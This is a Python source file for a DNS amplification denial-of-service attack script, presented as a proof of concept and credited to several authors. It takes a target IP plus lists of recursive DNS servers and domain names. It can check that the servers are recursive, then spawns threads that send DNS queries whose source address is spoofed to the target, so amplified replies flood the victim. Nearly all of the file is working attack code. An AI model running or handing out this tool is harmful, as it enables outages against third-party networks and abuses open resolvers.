#!/usr/bin/python # # DNS Amplification DOS Attack Script - Proof of Concept # # Co-Authored Johnathin Ferretti and Pat Litke # # Pat Litke | geudrik # Jonathin Ferretti | LISTERINe # # January 2012 # # # Modified (slightly) by Samiux on July 1, 2014 # # Dependencies # python-scapy # python-dnspython # # Original link : https://arcti.cc/python_dns_amplification.html # # Basic imports to do simple I/O from optparse import OptionParser from string import lower from os import path, system # Ensure that switches are set before we do much of anything else. # This ensures that system resources aren't unnecessarily used system("clear") print "###########################################################" print "### DNS Amplification DOS Attack - Proof of Concept ###" print "### ###" print "### Co-Authored : LISTERINe and geudrik ###" print "### Jon Ferretti & Pat Litke ###" print "### Last Modified : January 2012 ###" print "### Modified by : Samiux on July 1, 2014 ###" print "###########################################################" print "\n\n" parser=OptionParser() # Required Parameters parser.add_option("-t", "--target", action="store", dest="target", help="IP address of our target") parser.add_option("-s", "--servers", action="store", dest="servers", help="Path to our list of recursive DNS servers") parser.add_option("-a", "--arecords", action="store", dest="arecords", help="Path or our list of A-Name records") # Optional Parameters parser.add_option("-c", "--count", action="store", dest="count", default=5) parser.add_option("-v", "--verbose", action="store_true", dest="verbose") parser.add_option("--threads", action="store", dest="threads", default=1) parser.add_option("--verify", action="store_true", dest="verify") (options, args)=parser.parse_args() # Check to see that at least -t -s and -a are set as they are required if not options.target or not options.servers or not options.arecords: print "Options are as follows" print "-t : Target IP Address" print "-s : Path to DNS Server File in FQDN format" print "-a : Path to A Record FIle in FQDN format" print "-c : -1 for infinite, # of times to send packets" print "--verify : Verify that DNS servers are indeed recursive" print "-v : Set verbosity to true" print "--threads : Number of threads to spawn" print "\n" print "Example Usage\n" print "amplfiy.py -t -s /usr/so.list -a /usr/arec.list -c -1 --verify -v --threads=4" exit() else: print "All checks have passed successfully. You are about to launch" print " a DOS attack against "+options.target print "The following are the options passed..." print "Target : "+options.target print "Servers : "+options.servers print "A-Names : "+options.arecords print "Send Count : "+str(options.count) print "Verify Servers? : "+str(options.verify) print "Verbosity? : "+str(options.verbose) print "Thread Count : "+str(options.threads) proof=lower(raw_input("Are you sure you want to execute this attack? (Y/N) ")) if proof=="n": exit() # Clear our buffer and continue on... system("clear"); ## ##### ##################################################### # Sanitation code for our DNS amplification script ##################################################### ##### ## from dns import flags, resolver from os import path, system from sys import argv, stdout from random import randrange, seed from threading import Thread import logging # Supress IPv6 warnings... logging.getLogger("scapy.runtime").setLevel(logging.ERROR) from scapy.all import * ### Sanitize our A-Records List def pull_clean_servers(server_filename, verbose): # Populate our array serverlist try: handle = open(path.abspath(server_filename), "r") serverlist = handle.readlines() if verbose: print "Pre-sanitation: File opened and lines read" except: print "Bad filepath, cannot open file for reading "+server_filename+" " exit() # For each server in our serverlist (see above), clean it clean = [] for server in serverlist: try: clean.append(server.strip()) if verbose: print "Server Cleaned: "+server+" " except: print "Unable to parse servername: "+server+" " exit() print "\n=== A-Records List Sanitation Complete ===\n\n" return clean ## ##### #################################################### # Verification Code for our Name Servers #################################################### ##### ## def verify_ns(nslist, verbose): if verbose: print "Now verifying nameservers..." verified = [] for server in nslist: try: # Send our DNS request to the server answer = resolver.query(server) # Read DNS flags from response and check for RA flag DNSflags = (flags._to_text(answer.response.flags, flags._by_value, flags._flags_order)).split(" ") if "RA" in DNSflags: verified.append(server) if verbose: print "Server "+server+" is recursive" except: # Server is not recursive print "Server "+server+" is *NOT* recursive" return verified ## ##### #################################################### # Thread Class to handle our our Multi Threading #################################################### ##### ## class sender(Thread): # Define our __init__ struct def __init__(self, threadnum, data_package): Thread.__init__(self) self.data = data_package self.tnum = threadnum self.target = data_package[0] self.name_servers = data_package[1] self.A_records = data_package[2] self.send_limit = data_package[3] self.verbose = data_package[4] # Define our "push_dns_packets" struct def run(self): print "seeding..." seed() pac_num = 0 while self.send_limit != pac_num: ns = self.name_servers[randrange(0,len(self.name_servers))] A_record = self.A_records[randrange(0,len(self.A_records))] if self.verbose: print "| Sending Packet: "+str(pac_num+1)+" |", "Thread Number:", str(self.tnum)+" |", "Target:", self.target+" |", "Name Server:", ns+" |", "A-Record:", A_record+" |\n" # Send the packet :D :D send(IP(dst=ns, src=self.target)/UDP()/DNS(rd=1,qd=DNSQR(qname=A_record)), verbose=0) pac_num+=1 # Define our "run" struct #def run(self): # self.push_DNS_packets(self.tnum, self.data[0], self.data[1], self.data[2], self.data[3], self.data[4]) ## ##### ##################################################### # Let's start assigning variables and threadding ##################################################### ##### ## # Assign vars to be used in our threads. We'll do this one at a time to see where things break (if they do) try: Target = options.target except: print "Script Broke - Target assignment failed" exit() try: Nameservers = pull_clean_servers(options.servers, options.verbose) except: print "Script Broke - Nameservers assignment failed" exit() try: A_Records = pull_clean_servers(options.arecords, options.verbose) except: print "Script Broke - A_Records assignment failed." exit() # Things are sanitized. Do we need to verify our name servers? if options.verify: try: Nameservers = verify_ns(Nameservers, options.verbose) if options.verbose: print "Nameserver Verification Successful..." except: print "Errors were encountered (see above) in nameserver verification" print "You may continue, but the above nameservers will be ignored" ns_error=lower(raw_input("Would you like to still try the attack (suggest not)? (Y/N) : ")) if ns_error=="n": exit() # Pause so we can see diagnostic output finalcheck=lower(raw_input("This the last chance you get. Are you sure you want to continue? (Y/N) ")) print finalcheck if finalcheck=="n": print "n" exit() print "running" # So here we go, lets fire up some threads sendthreads = [] for thread in range(0,int(options.threads)): sendthreads.append(sender(thread+1, [Target, Nameservers, A_Records, int(options.count), options.verbose])) sendthreads[thread].start()